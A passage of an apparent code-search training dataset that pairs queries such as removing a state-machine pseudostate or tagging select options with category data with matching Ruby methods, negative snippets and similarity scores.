"0.437901",
"0.43698683",
"0.43677405",
"0.43673137",
"0.43587083",
"0.43549255",
"0.43529713",
"0.43436235",
"0.43419766",
"0.43327218",
"0.43290532",
"0.43289176",
"0.43212378",
"0.43171877",
"0.43168154",
"0.43058276",
"0.42980778",
"0.4298066",
"0.4296636",
"0.4295851",
"0.429449",
"0.4292067",
"0.42890567",
"0.4286773",
"0.4282695",
"0.4276861",
"0.42765817",
"0.42757794",
"0.42714468",
"0.42714468",
"0.42714468",
"0.42714468",
"0.42708293",
"0.42708293",
"0.42645708",
"0.42530864",
"0.42530677",
"0.4250406",
"0.42484385",
"0.42412305"
] |
0.0
|
-1
|
Removes a Pseudostate from this StateMachine.
|
def remove_connectionPoint! s
_log { "remove_connectionPoint! #{s.inspect}" }
@ownedMember.delete(s) # ownedElement?!?!
@connectionPoint.delete(s)
s.state = nil
# Notify.
s.connectionPoint_removed! self
self
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def delete_state(state)\n states.remove(state)\n end",
"def remove_state(state)\n self.from(state).each { |transition| remove(transition) }\n self.to(state).each { |transition| remove(transition) }\n self.states.delete(state)\n end",
"def remove_from_state state, ios\n return if ios.empty?\n\n state.send do |state|\n SelectorState.new(state.active - ios,\n state.inactive - ios,\n hash_without_keys(state.receivers, ios))\n end\n rescue => e\n log(Logger::ERROR, self.to_s + '#remove_from_state', e.to_s)\n end",
"def delete_state(state)\n @states.reject! { |_,v| v == state }\n#$stderr.print \"States: #{@states.length} \"\n end",
"def delete\n @reg.delete_bits(self)\n self\n end",
"def erase_state(state_id)\n super\n check_state_remove_effects(state_id)\n end",
"def destroy(state)\n hostname = state[:hostname]\n poolsclosed_delete(hostname)\n state.delete(:hostname)\n end",
"def destroy\n @state.destroy\n end",
"def destroy\n @state.destroy\n end",
"def delete_pid()\n if @pid.ours? then\n @pid.delete()\n end\n end",
"def pop_state\n @state.pop\n end",
"def remove_payment\n @payment = Payment.find(params[:id])\n @payment.update!(state: 2)\n end",
"def remove(value)\n connection.zrem(key_label, value)\n end",
"def clear_state\n @state.clear\n self\n end",
"def remove\n __flag__ :remove\n end",
"def remove_shape\n\t\t@shapes.delete_at(0)\n\tend",
"def remove(p)\n @first = counterclockwise(@first) if @first.equal?(p)\n @first = nil if @first.equal?(p)\n @neighbors.delete(p)\n end",
"def remove shape\n @remove_shapes << shape\n end",
"def uncheck\n self.checked = Time.at(0)\n end",
"def unstar\n set_starred_state(false)\n end",
"def delete_state(node)\n # => Find the Node\n existing = find_state(node)\n return 'Node not present in state' unless existing\n # => Delete the Node from State\n state.delete(existing)\n # => Write Out the Updated State\n write_state\n # => Return the Deleted Node\n existing\n end",
"def remove(el)\n n = word_number(el)\n if (n >= @bits.attr_length)\n grow_to_include(el)\n end\n @bits[n] &= ~bit_mask(el)\n end",
"def remove_current_spouse\n raise_unless_current_spouse_enabled\n if gclass.perform_validation_enabled\n ex_current_spouse = current_spouse\n current_spouse.current_spouse = nil\n self.current_spouse = nil\n transaction do\n ex_current_spouse.save!\n save!\n end\n else\n transaction do\n current_spouse.update_attribute(:current_spouse,nil)\n self.update_attribute(:current_spouse,nil)\n end\n end\n end",
"def remove\n uninstall_yri\n uninstall_yard\n end",
"def remove(host, plataform)\n @plataforms[plataform].rem(host)\n end",
"def unset(event)\n key[:schedule].zrem event\n end",
"def clearState()\n\t\t\t@_previous_state = @_state\n\t\t\t@_state = nil\n\t\tend",
"def remove_process!(redis, process_id)\n redis.zrem(key, process_id)\n end",
"def remove(x, y)\n @store[x, y] = 0\n end",
"def remove_token\n update(token: nil)\n end",
"def remove_timer_state(entry)\n timer = entry[1]\n @timers.delete entry\n @timers_time.delete timer\n\n state = remove_state(timer, State::STATE_TIMER)\n deregister_state timer if state == 0\n nil\n end",
"def unmark!\n @session.nickserv.mark(self.name, :off)\n end",
"def unset(name)\n update(name, nil)\n end",
"def remove_midi_source(source)\n @midi.inputs.delete(source)\n end",
"def remove\n @instantiations.dup.each(&:remove)\n @instantiations[0..-1] = []\n true\n end",
"def remove_node(index)\n @strat.remove_node(index)\n @ize -= 1\n end",
"def remove()\n return if @store.empty?\n\n swap(0, @store.length - 1)\n banished = @store.pop\n heap_down(0)\n\n return banished.value\n end",
"def op_del(attrname = nil)\n attrname ||= pop\n push pop.dup\n peek.delete(attrname)\n end",
"def remove\n @store.shift\n end",
"def discard_saved_state\n execute(\"discardstate\", @uuid)\n end",
"def remove_statefile(path)\n key = path.sub(\"#{statefiles_root}/#{@bucket}/\",'')\n delete_empty_statefile(key)\n end",
"def remove!\n zombie_check\n self.class.remove(@name)\n end",
"def clear\n current_state.clear\n end",
"def remove!; end",
"def remove_attribute(name)\n `#@native.removeAttribute(name)`\n end",
"def setup_rem_state\n return unless PONY::ERRNO::check_sequence(current_act)\n current_action_targets.each do |target|\n state_id = @acts[1]\n chance = @acts[2] || 100\n chance = chance / 100.0 if c.integer?\n target.remove_state(state_id) if rand < chance\n end\n end",
"def discard_property\n if(object.is_a?(SemanticProperty))\n SemanticProperty.delete(object.id)\n end\n end",
"def eject!\n #removes the first node\n node = @store.first\n @store.remove(node.key)\n\n #get rid of the map's reference to the deleted node\n @map.delete(node.key)\n end",
"def delete\n self.store -= self\n end",
"def remove_point(point)\n self.points.delete point\n point.cluster = nil\n end",
"def remove(type); end",
"def remove_self\n self.alive = false\n fire :remove_me\n @input_manager.unsubscribe_all self\n end",
"def remove_from_hot_list\n self.update_attribute(:added_to_hot_list, nil)\n end",
"def remove_entry(p)\n\t\t@person.delete(p)\n\tend",
"def remove; end",
"def remove; end",
"def remove; end",
"def remove; end",
"def destroy(state)\n ssh_command(\"#{config[:rmwpar]} -F #{config[:wpar_name]}\", :stderr)\n if wpar_exists?(state)\n raise ActionFailed, \"couldn't destroy wpar !\"\n end\n end",
"def remove_datapoint(key)\n @redis.srem \"datapoints\", key\n end",
"def do_remove_from_termination (term)\r\n term.aln_path_id = nil\r\n term.aln_path = nil\r\n term.save\r\n end",
"def single_sell_in_day_remover(item)\r\n item.sell_in -= 1\r\n end",
"def remove_element\n @app.dom_on_sockets.remove_element @id\n end",
"def removePool(msgstr, ipaddr)\n nmsg = MsgPacket::new\n nmsg.demarshallMsg(msgstr, ipaddr)\n nmsg.updatetime(nmsg)\n @MsgpoolObj.operateMsgPool(DELETE_MESSAGE, nmsg)\n end",
"def disassociate\n disassociate_address(_id)\n end",
"def destroy\n super\n parent.unlist_item(@sym)\n end",
"def remove!(pid)\n kill_child pid\n @pids.delete(pid)\n procline\n end",
"def remove_attribute(name); end",
"def remove_attribute(name); end",
"def remove_attribute(name); end",
"def remove_attribute(name); end",
"def remove_life \r\n @lives -= 1 # this is part of class and objects above\r\n end",
"def unown!(owned)\r\n master_song_relationships.find_by_master_song_owned_id(owned).destroy\r\n end",
"def unbind\n #@node.notifiers.unsubscribe(@notify_sid) if @notify_sid\n @node.command_connections.delete(self)\n end",
"def ~\n Not.new(self)\n end",
"def remove_house(house)\n @houses.delete(house)\n end",
"def remove\n unless self.empty?\n swap(0, @store.length - 1)\n removed_node = @store.pop\n\n heap_down(0)\n\n return removed_node.value\n end\n end",
"def remove( *ruleses )\n self.dup.remove!( *ruleses )\n end",
"def unevent(name)\n Events.remove(name)\n end",
"def clear_flag(symbol)\n @flags.delete(symbol)\n end",
"def unplug!\n return self unless exist?\n ole.Delete\n self\n end",
"def unselect_place\n @selected_place = nil;\n end",
"def remove()\n return if @store.empty?\n last = @store.length - 1\n curr = 0\n swap(last, curr)\n removed = @store.pop\n heap_down(curr)\n return removed.value\n end",
"def remove_attribute(name)\n `#{@element}.removeAttribute(#{name})`\n end",
"def removed(node)\n\t\t\t@size -= 1\n\t\t\treturn node\n\t\tend",
"def disassociate!(target)\n associate!(target,{:delete => 1})\n end",
"def remove_player p\n (@players ||= []).delete p.sym\n end",
"def unuse(n=1)\n self.used -= n\n end",
"def desist\n self.class.delete self\n end",
"def unsignup!(person)\n shifts.collect{|shift| shift.unsignup!(person)}\n end",
"def remove()\n removed = @store[0].value\n swap(0, @store.length - 1)\n @store.pop\n heap_down(0)\n return removed\n end",
"def delete_pose_index\n self.pose_words.clear if Pose.perform_search?\n end",
"def remove(element, new_time)\n @remove_set[element] = new_time.to_i\n self\n end",
"def remove(x, y)\n @store[x].remove(y)\n @store[y].remove(x) if undirected?\n end",
"def remove!(node)\n super\n key_to_node.delete(node.key)\n self\n end",
"def remove_synonym(name)\n execute \"DROP SYNONYM #{quote_table_name(name)}\"\n end",
"def delete!\n owner.delete_pin(myself)\n end",
"def remove\n node = @head\n\n if node\n @head = node.next_node\n @tail = nil unless @head\n\n node.data\n end\n end",
"def remove_attribute(name)\n attr = attributes[name].remove if key? name\n clear_xpath_context if Nokogiri.jruby?\n attr\n end",
"def unsave\n client.post('/api/unsave', id: read_attribute(:name))\n end"
] |
[
"0.5964532",
"0.5688853",
"0.5545519",
"0.5533242",
"0.5403126",
"0.52151054",
"0.5179823",
"0.50300175",
"0.50300175",
"0.502765",
"0.50002515",
"0.4985365",
"0.49594796",
"0.4955674",
"0.49229786",
"0.4909539",
"0.48985252",
"0.48846713",
"0.48604468",
"0.48604453",
"0.48546168",
"0.48496252",
"0.48428592",
"0.4815297",
"0.4810568",
"0.4809271",
"0.480893",
"0.47874427",
"0.4785427",
"0.47772568",
"0.4763617",
"0.47370997",
"0.47367823",
"0.4733378",
"0.4732369",
"0.47290605",
"0.4720744",
"0.46902907",
"0.46854386",
"0.46811327",
"0.4676887",
"0.46578822",
"0.46568763",
"0.46559915",
"0.46521786",
"0.4645584",
"0.46416852",
"0.46411473",
"0.4620852",
"0.46147242",
"0.46146992",
"0.46126264",
"0.46085724",
"0.46047056",
"0.45936263",
"0.45936263",
"0.45936263",
"0.45936263",
"0.45895037",
"0.45876607",
"0.45820278",
"0.45751977",
"0.45747107",
"0.45737147",
"0.45711192",
"0.45614603",
"0.45578736",
"0.45510548",
"0.45510548",
"0.45510548",
"0.45510548",
"0.45447963",
"0.45397073",
"0.45394936",
"0.45388103",
"0.45387644",
"0.45375478",
"0.45299822",
"0.45284763",
"0.452819",
"0.45257065",
"0.4523743",
"0.45226887",
"0.45169976",
"0.4516718",
"0.45156923",
"0.45112926",
"0.45064068",
"0.45010734",
"0.4495485",
"0.4494827",
"0.44921792",
"0.44888768",
"0.44793323",
"0.44776663",
"0.4474847",
"0.4474719",
"0.4474515",
"0.44691852",
"0.44624922"
] |
0.4648106
|
45
|
Add a data attribute to each option of the select to indicate which category the choice is linked to, if any. This allows us to show and hide appropriate fields in JavaScript based on the category.
|
def options_for_select
choices.map do |choice|
data = {}
data["choice-category"] = choice.category_id if choice.category_id
content_tag(
:option,
choice.short_name,
:value => choice.id,
:selected => selected_choice?(item, choice),
:data => data
)
end.join.html_safe
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def option_selects\n content_profile_entries.map do |cpe|\n [cpe.description, cpe.id, {'data-description': \"#{cpe.content_type}:#{cpe.topic_type}\"} ]\n end\n end",
"def drink_categories \n # indicate this is coming from signup\n @create_drink_profile = true\n \n # set defaults\n @beer_chosen = 'hidden'\n @cider_chosen = 'hidden'\n @wine_chosen = 'hidden'\n \n if user_signed_in?\n # get user info\n @user = User.find_by_id(current_user.id)\n # send getting started step to jquery\n gon.getting_started_step = @user.getting_started_step\n \n # find if user has already chosen categories\n @user_preferences = DeliveryPreference.find_by_user_id(@user.id)\n \n if !@user_preferences.blank?\n if @user_preferences.beer_chosen == true\n @beer_chosen = 'show'\n end\n if @user_preferences.cider_chosen == true\n @cider_chosen = 'show'\n end\n if @user_preferences.wine_chosen == true\n @wine_chosen = 'show'\n end \n end\n else\n gon.getting_started_step = 0\n end\n\n end",
"def parse_data_options(tag, options)\n return unless options\n parsed_options = options.dup\n options.each do |key, value|\n next if !DATA_ATTRIBUTES.include?(key) || (tag.to_s == 'form' && key == :method)\n parsed_options[\"data-#{key}\"] = parsed_options.delete(key)\n parsed_options[:rel] = 'nofollow' if key == :method\n end\n parsed_options\n end",
"def options_for_category_select(collection={}, category = Category.new)\n \n html_code = \"<option value=\"\">None</option>\"\n \n if collection.empty?\n html_code\n else\n parents = collection.select{ |kategory| kategory.parent_id.nil? }\n parents.each do |parent|\n options = {:value => parent.id}\n options = options.merge({:selected=>\"selected\"}) if parent == category\n html_code += tag(\"option\", options, true) + parent.name + \"</option>\" + indent_child_options_for_category_select(parent, category)\n end\n html_code\n end\n\n end",
"def attr_map \n h = {\n 'data-id' => id,\n 'data-posters' => (@posters || []).map do |p|\n p.attributes.merge(:web_location => p.href)\n end.to_json,\n 'data-year' => @year,\n 'class' => (thumbnail() ? 'withPoster lazyLoadNeeded' : 'noPoster')\n }\n h['data-thumb-src'] = thumbnail.href if thumbnail\n genres.split(',').reduce(h){ |ha, g| ha[\"data-category-#{g.downcase.gsub(' ', '_')}\"] = true; ha }\n end",
"def fresh_categories\n # these are the categories that will be displayed by default\n # in the html view\n return {\n \"speakerData\" => {\"label\" => \"Character Direct Speech\", \"data\" => []},\n \"indirectData\" => {\"label\" => \"Character Indirect Diction\", \"data\" => []},\n \"traitData\" => {\"label\" => \"Trait: Character Type\", \"data\" => []}, \n \"genderData\" => {\"label\" => \"Trait: Character Sex\", \"data\" => []},\n \"maritalStateData\" => {\"label\" => \"Trait: Character Marriage Status\", \"data\" => []},\n \"socecStatusData\" => {\"label\" => \"Trait: Character Class Status\", \"data\" => []},\n \"ageData\" => {\"label\" => \"Trait: Character Age\", \"data\" => []},\n \"occupationData\" => {\"label\" => \"Trait: Character Occupation\", \"data\" => []},\n }\nend",
"def fill_subcategory\n @select_data = Subcategory.ordered_by_category params[:category_id]\n end",
"def indent_child_options_for_category_select(parent, category, child_indent = \" \")\n html_code = \"\"\n parent.children.each do |child|\n options = {:value => child.id}\n options = options.merge({:selected=>\"selected\"}) if child == category\n html_code += tag(\"option\", options, true) + child_indent + child.name + \"</option>\" + indent_child_options_for_category_select(child, category, child_indent + child_indent)\n end\n html_code\n end",
"def chosen_categories\n return chosen_options.collect &:category\n end",
"def dropdown_criterion_question(count, answer = nil, questionnaire_min, questionnaire_max)\n current_value = ''\n current_value += 'data-current-rating =' + answer.answer.to_s unless answer.nil?\n html = '<div><select id=\"responses_' + count.to_s + '_score\" name=\"responses[' + count.to_s + '][score]\" class=\"review-rating\" ' + current_value + '>'\n html += \"<option value = ''>--</option>\"\n questionnaire_min.upto(questionnaire_max).each do |j|\n html += '<option value=' + j.to_s\n html += ' selected=\"selected\"' if !answer.nil? && j == answer.answer\n html += '>' + j.to_s\n html += '-' + min_label if min_label.present? && j == questionnaire_min\n html += '-' + max_label if max_label.present? && j == questionnaire_max\n html += '</option>'\n end\n\n html += '</select></div><br><br><textarea' + ' id=\"responses_' + count.to_s + '_comments\"'\n html += ' name=\"responses[' + count.to_s + '][comment]\" class=\"tinymce\">'\n html += answer.comments if !answer.nil? && !answer.comments.nil?\n html += '</textarea></td>'\n end",
"def association_ajax_select_tag(id, record, reflection)\n if reflection.klass.scaffold_use_auto_complete\n scaffold_text_field_tag_with_auto_complete(id, reflection.klass)\n else\n singular_class = record.class\n foreign_key = reflection.options[:foreign_key] || singular_class.table_name.classify.foreign_key\n association_foreign_key = reflection.options[:association_foreign_key] || reflection.klass.table_name.classify.foreign_key\n join_table = reflection.options[:join_table] || ( singular_class.table_name < reflection.klass.table_name ? '#{singular_class.table_name}_#{reflection.klass.table_name}' : '#{reflection.klass.table_name}_#{singular_class.table_name}')\n items = reflection.klass.find(:all, :order => reflection.klass.scaffold_select_order, :conditions =>[\"#{reflection.klass.table_name}.#{reflection.klass.primary_key} NOT IN (SELECT #{association_foreign_key} FROM #{join_table} WHERE #{join_table}.#{foreign_key} = ?)\", record.id], :include=>reflection.klass.scaffold_include)\n select_tag(id, \"<option></option>\" << items.collect{|item| \"<option value='#{item.id}' id='#{id}_#{item.id}'>#{h item.scaffold_name}</option>\"}.join(\"\\n\"))\n end\n end",
"def drink_categories\n # find if user has already chosen categories\n @user_preferences = DeliveryPreference.find_by_user_id(current_user.id)\n \n # set defaults\n @beer_chosen = 'hidden'\n @cider_chosen = 'hidden'\n @wine_chosen = 'hidden'\n if !@user_preferences.blank?\n if @user_preferences.beer_chosen == true\n @beer_chosen = 'show'\n end\n if @user_preferences.cider_chosen == true\n @cider_chosen = 'show'\n end\n if @user_preferences.wine_chosen == true\n @wine_chosen = 'show'\n end \n end\n \n # set last saved\n @last_saved = @user_preferences.updated_at\n \n end",
"def options_for_component_select var_name, var_data, fields, item\n options = []\n\n # _nil\n unless var_data[:required]\n options.push ['', '_nil']\n end\n\n # fields\n fields.each do |field|\n options.push [field, field]\n end\n\n # _literal\n options.push ['Literal...', '_literal']\n\n # figure\n current = value_for_data(var_name, item)\n\n return options_for_select(options, current)\n end",
"def name_for_select_for_facture\n @name_for_select = self.factcat.name + \" - \" + self.name\n end",
"def filter_option(form_builder, field, option)\n selected = matches_filter_option(field, option[1])\n options = {}\n options[:label] = option[0]\n options[:required] = false\n options[:input_html] = { :id => \"filter_#{field}_#{option[1]}\", :type => :checkbox, :value => option[1], :multiple => true }\n options[:input_html][:checked] = selected\n options[:label_html] = { :for => \"filter_#{field}_#{option[1]}\" }\n options[:wrapper_html] = { :class => \"filter-controls-hidden\" }\n\n klass = [\"filter-options\"]\n klass << \"selected\" if selected\n\n add_filter_klass = [\"filter-add\"]\n if selected\n add_filter_klass << \"icon-remove\"\n else\n add_filter_klass << \"icon-plus\"\n end\n\n content = link_to(\"\", \"#\", :class => add_filter_klass.join(' '))\n content << form_builder.input(field, options)\n\n content_tag :li, content, :class => klass.join(' ')\n end",
"def select_category3(category_option)\n category_locator = Locator.new(NewRequestWhatLocators::CATEGORY).replace_value('<category>', category_option)\n sp_helper.select_radio_btn(category_locator)\n end",
"def set_data(params)\n\t\t#if this is the first time, need to initialize the hash\n\t\tif !self.data[:control_widget] then self.data[:control_widget] = {} end\n\t\t\n\t\tself.data[:control_widget][:choice_1_label_1] = params[:choice_1_label_1]\n\t\tself.data[:control_widget][:choice_1_dest1_page_id] = params[:choice_1_dest1_page_id]\n\t\tself.data[:control_widget][:choice_2_label_1] = params[:choice_2_label_1]\n\t\tself.data[:control_widget][:choice_2_dest2_page_id] = params[:choice_2_dest2_page_id]\n\tend",
"def html_attributes_options(options)\n html_options = options.stringify_keys!\n self.default_options = {'data-role' => \"listview\", 'data-inset' => \"true\"}\n\n if html_options.has_key?('data-inset')\n self.default_options = default_options.merge({'data-inset' => html_options['data-inset']})\n end\n\n if html_options.has_key?('data-theme')\n self.default_options = default_options.merge({'data-theme' => html_options['data-theme']})\n end\n\n if html_options.has_key?('data-rel')\n self.default_options = default_options.merge({'data-rel' => html_options['data-rel']})\n end\n\n if html_options.has_key?('data-transition')\n self.default_options = default_options.merge({'data-transition' => html_options['data-transition']})\n end\n\n end",
"def selectCategory(data = {})\n self.has_expected_element?\n data = data_for('homepage',data)\n case data['category'].downcase.gsub(/\\s+/, '')\n when 'news&politics'\n news_and_politics_element.click\n when 'style'\n style_element.click\n end\n end",
"def build_select(type, select_options_as_html); end",
"def in_my_select attrs = nil\n attrs[:class] ||= ''\n attrs[:class] << ' myselect'\n attrs[:class] = attrs[:class].strip\n\n # La taille du menu peut être déterminé par :width\n size = attrs.delete(:size) || 'normal'\n\n # Il faut ajouter un champ hidden qui contiendra vraiment\n # la valeur avec le nom déterminé\n fid = attrs[:id] || attrs[:name]\n fname = attrs[:name] || attrs[:id]\n attrs[:id] = \"myselect_#{fid}\"\n attrs[:name] = \"myselect_#{fname}\"\n \"<div class=\\\"container_myselect #{size}size\\\">\" +\n attrs[:selected].in_hidden(id: fid, name: fname) +\n self.class.opened_tag('div', attrs) + self.to_s + '</div>' +\n '</div>'\n end",
"def combobox_tag(name, options, opts= {})\n @template.content_tag(:input, :name => \"findpost[\"+sanitize_to_id(name)+\"]\", :placeholder => \"ENGL\", :maxlength => 4, :style => \"width: 55px;\", :type => \"text\", :list => opts[:list_id]) do\n content_tag(:datalist, :id => opts[:list_id]) {options}\n end \n end",
"def category_options\n Category.all.map { |c| [c.categoryName,c.id]}\n end",
"def select_category\n puts \"Please select from the following catagories:\\n\\n\"\n category_lister\n puts \"\\n\\n\"\n fact_input\n end",
"def list\n categories = Meal.distinct.pluck(:category)\n meal_list = []\n categories.each { |category|\n obj = {\n groupName: category.capitalize,\n options: Meal.where(category: category).select(:id, :name)\n }\n meal_list.push(obj)\n }\n\n render json: meal_list\n end",
"def set_category_option\n @category_option = CategoryOption.find(params[:id])\n end",
"def generate_codebook_time_series_group_option(group)\n cls = group.parent_id.present? ? 'subgroup' : 'group'\n content = 'data-content=\\'<span>' + group.title + '</span><span class=\"right-icons\">'\n desc = group.description.present? ? group.description : I18n.t('app.msgs.jumpto_group')\n if group.parent_id.present?\n content << subgroup_icon(desc)\n else\n content << group_icon(desc)\n end\n content << '</span>\\''\n\n return \"<option value='#{group.id}' class='#{cls}' #{content}>#{group.title}</option>\"\n end",
"def uhook_category_partial category\n locale = ::Locale.find_by_iso_code(category.locale)\n content_tag(:dt, ::Category.human_attribute_name(\"locale\") + ':') +\n content_tag(:dd, (locale.native_name.capitalize.html_safe rescue t('ubiquo.category.any')))\n end",
"def set_category\n end",
"def create_select_options(choice, collection, options={})\n options[:text] ||= 'name'\n options[:value] ||= 'id'\n options[:include_blank] = true if options[:include_blank].nil?\n options[:clear] ||= []\n pre = options[:include_blank] ? \"<option value=\"\">\"\"</option>\" : \"\"\n collection.each { |c| pre << \"<option value=#{c.send(options[:value])} #{\"selected=\\\"selected\\\"\" if choice == c.send(options[:value])}>#{c.send(options[:text])}</option>\" }\n pre\n end",
"def return_cat_data(categories, data)\n category_data = []\n categories.each do |category|\n category_data.push(category[\"#{data}\"])\n end\n category_data\nend",
"def allowed_cat_entries(options)\n rails_logger('allowed_cat_entries', 0)\n @values[\"#{options[:prov_field_name]}_category\".to_sym] = options[:category]\n cat = Classification.lookup_by_name(options[:category].to_s)\n result = cat ? cat.entries.each_with_object({}) { |e, h| h[e.name] = e.description } : {}\n rails_logger('allowed_cat_entries', 1)\n result\n end",
"def new\n @post = Post.new\n @category_options = Category.all.map{|u| [u.title, u.id]}\n # @category_options = Category.all\n end",
"def ajax_category\n case params[:category]\n when Reporting::ALL\n @query_hash = {:category_all => true}\n when Reporting::PROVIDER\n @query_hash = {:category_provider => true}\n when Reporting::PATIENT\n @query_hash = {:category_patient => true}\n when Reporting::CLAIM\n @query_hash = {:category_claim => true}\n when Reporting::BALANCE\n @query_hash = {:category_balance => true}\n when Reporting::INVOICES\n @query_hash = {:category_invoice => true}\n when Reporting::USER\n @query_hash = {:category_user => true}\n when Reporting::SYSTEM\n @query_hash = {:category_system => true}\n end\n @reporting = Reporting.without_status(:deleted).where(@query_hash)\n end",
"def variant_options(v, options={})\n #content_tag(:ul, :class => \"list\")\n # v.options_text\n #we have hide additional price shown in varians\n # if variant_price v\n # v.options_text.to_s + \" \" + (variant_price v).to_s\n # else\n v.options_text\n # end\n end",
"def select_cat_from_tree(obj, col, root, selected_obj, *args)\n options = args.extract_options!\n select_name = obj + '[' + col.to_s + ']'\n out = \"<select name='#{select_name}' onchange => update_category('#{obj}', facture)>\"\n out << select_cat_from_tree_recurs(root, selected_obj)\n out << \"</select>\"\n end",
"def select_category\n #Parbauda vai ekrans ir redzams\n @screens.screen_create_filter.visible?\n #Pievieno kategoriju no filtra datiem\n @screens.screen_create_filter.select_row(@filter_data.category)\n end",
"def select_tag(name, option_values, options={})\n label = options.delete(:label) || name.titleize\n label.gsub!(' ', ' ')\n content_tag(\"dt\", content_tag(\"label\" , \"#{label}:\", :for => name )) + \"\\n\" +\n content_tag(\"dd\", @super.select_tag(name, option_values, options))\n end",
"def option_tag(text); end",
"def uhook_select_fittest category, options = {}\n options[:locale] ? (category.in_locale(options[:locale]) || category) : category\n end",
"def tags_and_categories=(text)\n active_content_div.text_field(:id=>/as-input-\\d+/).set text +\"\\n\"\n wait_for_ajax\n end",
"def create_fields_of(data, category)\n data.each do |k, v|\n params = Field.class_name_for_type(v['type']).constantize.create_from_hash(k, v)\n params.merge!(category: category)\n field = Field.class_name_for_type(v['type']).constantize.create!(params)\n self.general_fields << field #NOTE Since we have already created the object, the category attribute will not change if we add it to the incorrect set of fields. Hence, just add all to general_fields\n end\n end",
"def populate(attributes)\n attributes.each do |attribute, value|\n id = id_for(attribute)\n\n case control_type_for(id)\n when :file\n attach_file id, value\n when :select\n find_by_id(id).find(\"option[value='#{value}']\").select_option\n when :checkbox\n find_by_id(id).set(value)\n else\n fill_in id, :with => value\n end\n end\n end",
"def option_list(label_attribute = 'name')\n countries.map { |country| [country[label_attribute], country['code']] }\n end",
"def opportunity_campaign_select(options = {})\n options[:selected] ||= @opportunity.campaign_id || 0\n selected_campaign = Campaign.find_by_id(options[:selected])\n campaigns = ([selected_campaign] + Campaign.my.order(:name).limit(25)).compact.uniq\n collection_select :opportunity, :campaign_id, campaigns, :id, :name, options,\n \"data-placeholder\": t(:select_a_campaign),\n \"data-url\": auto_complete_campaigns_path(format: 'json'),\n style: \"width:330px; display:none;\",\n class: 'ajax_chosen'\n end",
"def custom_item_form options\n group_html = \"<li id='#{options[:id]}' class='p'>\"\n group_html += options[:label] ? \"<label for='#{options[:id]}'>#{options[:label]}</label>\" : \"\"\n group_html += \"<div class='wrap-custom-html'>#{options[:html]}</div>\"\n group_html += options[:hint] ? \"<p class='inline-hints'>#{options[:hint]}</p>\" : \"\"\n group_html += \"</li>\"\n group_html.html_safe\n end",
"def set_dropdown_condition(name,value,condition)\n self.dropdown_conditions[\"#{name.to_s}_#{value}\"] = condition\n end",
"def set_lectures\r\n @category = Category.find(params[:category_id])\r\n end",
"def indent_child_options_for_parent_category_select(category, parent, child_indent = \" \")\n html_code = \"\"\n parent.children.each do |child|\n options = {:value => child.id}\n options = options.merge({:selected=>\"selected\"}) if child == category.parent\n html_code += tag(\"option\", options, true) + child_indent + child.name + \"</option>\" + indent_child_options_for_parent_category_select(category, child, child_indent + child_indent) unless child==category\n end\n html_code\n end",
"def normalize_options\n copy_options_to_attributes(ATTRIBUTE_OPTIONS)\n copy_boolean_options_to_attributes(ATTRIBUTE_BOOLEAN_OPTIONS)\n handle_key_option\n handle_errors_option\n\n Forme.attr_classes(@attr, @opts[:class]) if @opts.has_key?(:class)\n\n if @opts[:error]\n Forme.attr_classes(@attr, 'error')\n @attr[\"aria-invalid\"] = \"true\"\n if @opts.fetch(:error_handler, true)\n if @opts[:error_id]\n @attr['aria-describedby'] ||= @opts[:error_id]\n else\n if id = @attr[:id] || @attr['id']\n error_id = @attr['aria-describedby'] ||= \"#{id}_error_message\"\n @opts[:error_id] = error_id\n end\n end\n end\n end\n\n if data = opts[:data]\n data.each do |k, v|\n k = k.to_s.tr(\"_\", \"-\") if k.is_a?(Symbol) && input.opts[:dasherize_data]\n sym = :\"data-#{k}\"\n @attr[sym] = v unless @attr.has_key?(sym)\n end\n end\n end",
"def manipulate_option(yaml_data_key)\n manipulate_option_raw(\n get_yaml_data( yaml_data_key, 0 ).to_sym,\n get_yaml_data( yaml_data_key, 1 ).to_sym,\n get_yaml_data( yaml_data_key, 2 ),\n get_yaml_data( yaml_data_key, 3 ),\n get_yaml_data( yaml_data_key, 4 )\n )\n end",
"def select_list_option\n select_list.a(:class => \"select-list-option\")\n end",
"def select_list\n require 'pashua'\n include Pashua\n\n config = \"\n *.title = personal time tracker\n cb.type = combobox\n cb.completion = 2\n cb.width = 400\n cb.default = surfing\n cb.tooltip = Choose from the list\n db.type = cancelbutton\n db.label = Cancel\n db.tooltip = Closes this window without taking action\" + \"\\n\"\n\n # insert list of all choices\n cust = get_custom_cats || []\n cat = (cust ? cust + Categories : Categories)\n cat.each { |c| config << \"cb.option = #{c}\\n\" }\n pagetmp = pashua_run config\n exit if pagetmp['cancel'] == 1 || pagetmp['cb'] == nil\n\n choice = pagetmp['cb'].strip\n notify_change(choice)\n log(choice)\n\n unless cat.index(choice)\n cust << choice\n write_custom_cats(cust)\n end\nend",
"def set_catagory\n @catagory = Catagory.find(params[:id])\n end",
"def select(attribute, choices, options = {})\n object_value = @object ? @object.send(attribute) : nil # grab the object's value\n options.reverse_merge!(:label => attribute.to_s.titleize, :id => \"#{object_name(:id)}_#{attribute}\")\n @renderer.select_tag(\"#{object_name}[#{attribute}]\", @template.options_for_select(choices, object_value), options)\n end",
"def data_attributes=(attributes)\n attributes.each do |k, v|\n self[\"data-#{k}\"] = v\n end\n end",
"def define_dynamic_answer_setters!\n if offering\n offering.questions.find_all_by_dynamic_answer(true).each do |oq|\n if oq.display_as.include?(\"checkbox_options\")\n oq.options.each do |option|\n self.class.send :define_method, \"dynamic_answer_#{oq.id.to_s}_#{option.id.to_s}=\", Proc.new {|argv| set_answer(oq.id, argv, option.id)}\n end \n else\n self.class.send :define_method, \"dynamic_answer_#{oq.id.to_s}=\", Proc.new {|argv| set_answer(oq.id, argv)}\n end \n end\n end\n end",
"def use_data_with(key, value)\n value = preprocess_value(value, key)\n\n element = public_send(key.to_s.tr(' ', '_'))\n set_and_select(key, element, value)\n check_and_uncheck(key, element, value)\n click(key, element)\n end",
"def category=(cat, *args, &block)\n cat = $game_system.masai_category if $game_system.masai_category.is_a?(Symbol)\n # Run Original Method\n super(cat, *args, &block)\n end",
